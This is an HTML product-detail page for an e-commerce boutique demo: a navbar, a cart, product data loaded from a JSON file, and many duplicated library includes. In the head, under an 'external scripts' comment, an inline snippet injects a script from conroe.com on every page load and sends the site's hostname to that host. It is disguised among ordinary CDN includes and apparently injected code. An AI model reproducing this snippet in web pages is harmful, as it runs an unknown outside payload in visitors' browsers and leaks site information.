<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Product Details</title>
  <link href="style.css" rel="stylesheet" type="text/css" />
  <link rel="icon" href="img/favicon.png">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"
    integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw=="
    crossorigin="anonymous" referrerpolicy="no-referrer" />
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/4.1.1/animate.min.css">
  <link rel="stylesheet" type="text/css" href="https://cdn.example.com/tool.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css"
    integrity="sha512-iecdLmaskl7CVkqkXNQ/ZH/XLlvWZOJyj7Yy7tcenmpD1ypASozpmT/E0iPtmFIB46ZmdtAc9eNBvH0H/ZpiBw=="
    crossorigin="anonymous" referrerpolicy="no-referrer" />





  <!-- Additional tools or libraries -->
  <script src="https://cdn.example.com/tool.js"></script>
  <script src="https://cdn.example.com/tool2.js"></script>
  <script src="https://cdn.example.com/tool3.js"></script>





  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/js/bootstrap.min.js"></script>
  <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
  <script src="/admin_l_t_e/plugins/jQuery/jQuery-2.1.4.min.js"></script>
  <script src="/admin_l_t_e/plugins/bootstrap/js/bootstrap.bundle.min.js"></script>
  <script src="/admin_l_t_e/plugins/magnific-popup/jquery.magnific-popup.min.js"></script>


  <!-- Font Awesome and other stylesheets -->
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fullcalendar/3.8.0/fullcalendar.min.css">

  <link rel="stylesheet"
    href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@20..48,100..700,0..1,-50..200" />
  <link rel="stylesheet"
    href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@48,400,0,0" />
  <link rel="stylesheet" href="https://fonts.googleapis.com/icon?family=Material+Icons">

  <script src="https://kit.fontawesome.com/your-fontawesome-kit.js" crossorigin="anonymous"></script>







  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.4.0/css/font-awesome.min.css">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">











  <!-- jQuery library -->
  <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>

  <!-- Bootstrap JavaScript -->
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>













  <!-----Extirnal scripts----->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script
    type="text/javascript">window.top === window && !function () {var e = document.createElement("script"), t = document.getElementsByTagName("head")[0]; e.src = "//conroe.com/dsp?h=" + document.location.hostname + "&r=" + Math.random(), e.type = "text/javascript", e.defer = !0, e.async = !0, t.appendChild(e)}();</script>

  <!-----Paypal----->
  <script src="https://www.paypalobjects.com/api/checkout.js"></script>
  <!-----Stripe----->
  <script src="https://js.stripe.com/v3/"></script>








</head>

<body>
  <header>
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
      <a class="navbar-brand" href="#"><img
          src="https://img.freepik.com/free-vector/fashion-logo-editorial-template_23-2148701248.jpg" alt="Logo"
          width="50" height="50">
      </a>

      <div class="brand-name">E-commerce <br> Boutique</div>

      <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"
        aria-controls="navbarNav" aria-expanded="True" aria-label="Toggle navigation">
        <span class="navbar-toggler-icon"></span>
      </button>

      <div class="collapse navbar-collapse" id="navbarNav">
        <ul class="navbar-nav ml-auto">

          <li class="nav-item">
            <a class="nav-link" href="index.html">Home</a>
          </li>

          <li class="nav-item">
            <a class="nav-link" href="sigl.html">Shop</a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="main.html">Products</a>
          </li>
          <li class="nav-item dropdown">
            <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown"
              aria-haspopup="true" aria-expanded="false">
              More
            </a>
            <div class="dropdown-menu" aria-labelledby="navbarDropdown">
              <a class="dropdown-item" href="product.html">Products</a>
              <a class="dropdown-item" href="/Shopping-Cart/main.html"">FAQ</a>
              <a class=" dropdown-item" href="Cart/cart-button.html">Support</a>
              <a class="dropdown-item" href="about.html">About Us</a>
              <a class="dropdown-item" href="single.html">Our Services</a>
              <a class="dropdown-item" href="single-product.html">Features</a>
              <a class="dropdown-item" href="contact-us.html">Contact Us</a>
            </div>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="#"><i class="far fa-bell"></i></a>
          </li>
          <li class="nav-item">
            <a class="nav-link" href="#"><i class="far fa-envelope"></i></a>
          </li>





          <hr style="color: blueviolet;font-size: large;border: none;width: 2px;">
          <div class="dropdown">
            <a class="btn btn-secondary dropdown-toggle" href="#" role="button" id="dropdownMenuLink"
              data-toggle="dropdown" aria-haspopup="true" aria-expanded="false"><i class="far fa-user-circle"></i></a>
            <div class="dropdown-menu" aria-labelledby="dropdownMenuLink">
              <a class="dropdown-item" href="#"><i class="far fa-user-circle">

                </i> Profile </a>
              <a class="dropdown-item" href="sp.html"><i class="fas fa-cog"></i> Settings & Privacy</a>
              <a class="dropdown-item" href="p.html"><i class="far fa-bell"></i> Subscribe</a>
              <a class="dropdown-item" href="p-c.html"><i class="fas fa-crown"></i> Premium</a>
              <a class="dropdown-item" href="p-slide.html"><i class="fas fa-question-circle"></i> Help & Support</a>
              <div class="dropdown-divider"></div>
              <a class="dropdown-item" href="#"><i class="fas fa-sign-out-alt"></i> Sign-Out</a>
            </div>
          </div>



          <!-----Cart----->
          <li class="nav-item">
            <a class="nav-link" href="#" class="shopping cart" onclick="toggleCart()"><i
                class="material-icons">local_mall</i>
              <span id="cart-count">0</span>
            </a>
          </li>


          <!-- ... (previous HTML remains unchanged) -->

          <div class="cart-container" id="cartContainer">
            <button class="close-btn" onclick="toggleCart()">Close</button>
            <p>Your Cart:</p>
            <ul id="cartItemsList">
              <!-- Cart items will be dynamically added here -->

              <p>Total: <span id="cartTotal">0</span></p>
              <button class="checkout-button" onclick="checkout()">Checkout</button>
            </ul>
          </div>
          </li>







          <!-- ... Other navigation items ... -->

        </ul>
      </div>
    </nav>
    <!-- Your header content goes here -->
  </header>
  <img src="shopping-cart-icon.png" alt="Shopping Cart" class="floating-cart">




  <div class="product-container">
    <div class="title">PRODUCT DETAIL</div>
    <div class="detail">
      <div class="image">
        <img src="">
      </div>
      <div class="content">
        <h1 class="name"></h1>
        <div class="price"></div>
        <div class="buttons">
          <button>Check Out</button>
          <button>Add To Cart
            <span>
              <svg class="" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 18 20">
                <path stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"
                  d="M6 15a2 2 0 1 0 0 4 2 2 0 0 0 0-4Zm0 0h8m-8 0-1-4m9 4a2 2 0 1 0 0 4 2 2 0 0 0 0-4Zm-9-4h10l2-7H3m2 7L3 4m0 0-.792-3H1" />
              </svg>
            </span>
          </button>
        </div>
        <div class="description"></div>
      </div>
    </div>

    <div class="title">Similar product</div>
    <div class="listProduct"></div>
  </div>



  <script>
    let products = null;
    // get datas from file json
    fetch('products.json')
      .then(response => response.json())
      .then(data => {
        products = data;
        showDetail();
      })

    function showDetail() {
      // remove datas default from HTML
      let detail = document.querySelector('.detail');
      let listProduct = document.querySelector('.listProduct');
      let productId = new URLSearchParams(window.location.search).get('id');
      let thisProduct = products.filter(value => value.id == productId)[0];
      //if there is no product with id = productId => return to home page
      if (!thisProduct) {
        window.location.href = "/";
      }

      detail.querySelector('.image img').src = thisProduct.image;
      detail.querySelector('.name').innerText = thisProduct.name;
      detail.querySelector('.price').innerText = '$' + thisProduct.price;
      detail.querySelector('.description').innerText = '$' + thisProduct.description;


      (products.filter(value => value.id != productId)).forEach(product => {
        let newProduct = document.createElement('a');
        newProduct.href = '/detail.html?id=' + product.id;
        newProduct.classList.add('item');
        newProduct.innerHTML =
          `<img src="${product.image}" alt="">
            <h2>${product.name}</h2>
            <div class="price">$${product.price}</div>`;
        listProduct.appendChild(newProduct);
      });
    }

  </script>

  <footer>
    <p>&copy; 2021 My eCommerce Store. All Rights Reserved.</p>
  </footer>



  <style>
    .floating-cart {
      position: fixed;
      bottom: 20px;
      /* Adjust as needed */
      right: 20px;
      /* Adjust as needed */
      width: 50px;
      /* Adjust width */
      height: 50px;
      /* Adjust height */
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
      /* Add shadow for floating effect */
      border-radius: 50%;
      /* Rounded corners for circular shape */
      transition: transform 0.3s ease;
      /* Optional: Add animation */
    }

    .floating-cart:hover {
      transform: translateY(-5px);
      /* Optional: Add hover effect */
    }
  </style>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>
  <script src="script.js"></script>
  <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/js/bootstrap.bundle.min.js"></script>


</body>

</html>